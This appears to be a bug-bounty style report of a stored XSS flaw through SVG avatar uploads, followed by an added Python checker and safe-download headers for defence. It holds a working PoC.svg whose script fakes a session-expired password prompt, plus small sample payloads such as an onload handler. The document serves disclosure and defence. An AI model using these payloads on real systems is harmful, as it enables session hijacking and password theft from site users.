Stored XSS via uploading a Photo avatar in .svg format in Account data.
When the attachment is opened, files in some formats are rendered and loaded by the browser, so any JavaScript that was injected into the attachment beforehand is executed.
PoC.svg
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script>
var xss = prompt("Hi user!\nYour session is expired, please enter password to login again!");
if (xss != null) {
alert("Your password is: " + xss);
}
</script>
</svg>
1. After login, click the name in the top right corner -> go to Account
2. In the Account data tab, scroll down to the bottom
3. In the Photo section, click Choose file and choose PoC.svg, then click Update
4. After uploading successfully, copy the link to that image and open it in a new tab.
The XSS will trigger when the attachment is opened in a new tab.
This vulnerability has the potential to deface websites, result in compromised user accounts, and run malicious code on web pages, which can lead to a compromise of the user's device.
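A server-side check a defender could add, as an added example that is not part of the original report and not the application's own code: it flags SVG avatars that carry script elements, event-handler attributes or script-scheme hrefs, and returns the response headers that make the browser download an upload instead of rendering it in the site's origin. The sample SVGs (a cut-down copy of PoC.svg, a clean avatar and an event-handler variant) are constructed here; the use of defusedxml in production is an assumption.

```python
import re
import xml.etree.ElementTree as ET   # assumption: swap in defusedxml in production

ACTIVE_ELEMENTS = ("script", "foreignobject")   # elements that run or embed code
SCRIPT_SCHEMES = ("javascript", "vbscript")

def svg_active_content(svg_bytes):
    """Return findings describing active content in an SVG upload ([] = none found)."""
    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError as exc:
        return ["unparseable XML: %s" % exc]
    findings = []
    for elem in root.iter():
        tag = elem.tag.split("}", 1)[-1]            # drop the namespace prefix
        if tag.lower() in ACTIVE_ELEMENTS:
            findings.append("<%s> element" % tag)
        for name, value in elem.attrib.items():
            local = name.split("}", 1)[-1].lower()
            if local.startswith("on"):              # onload=, onclick=, ...
                findings.append("%s attribute on <%s>" % (local, tag))
            elif local == "href":
                # remove whitespace/control chars so "java\tscript:" is still caught
                scheme = re.sub(r"[\s\x00-\x1f]", "", value).lower().split(":", 1)[0]
                if scheme in SCRIPT_SCHEMES:
                    findings.append("%s: URL in href on <%s>" % (scheme, tag))
    return findings

def safe_download_headers(filename):
    """Headers that make the browser download an upload instead of rendering it
    in the application's origin; the CSP is a backstop if it is rendered anyway."""
    safe_name = re.sub(r"[^A-Za-z0-9._-]", "_", filename) or "download"
    return {
        "Content-Type": "application/octet-stream",
        "Content-Disposition": 'attachment; filename="%s"' % safe_name,
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }

# Constructed samples: a cut-down copy of the report's PoC.svg, a clean avatar,
# and one that uses an event-handler attribute instead of a <script> element.
POC_SVG = b"""<?xml version="1.0" standalone="no"?>
<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255)" />
<script>alert("stored xss")</script>
</svg>"""
CLEAN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><circle r="40" fill="green"/></svg>'
HANDLER_SVG = b'<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"><rect width="5" height="5"/></svg>'
```

The element check is a secondary layer; the headers are the primary control, because a file that is never rendered in the application's origin cannot run script there.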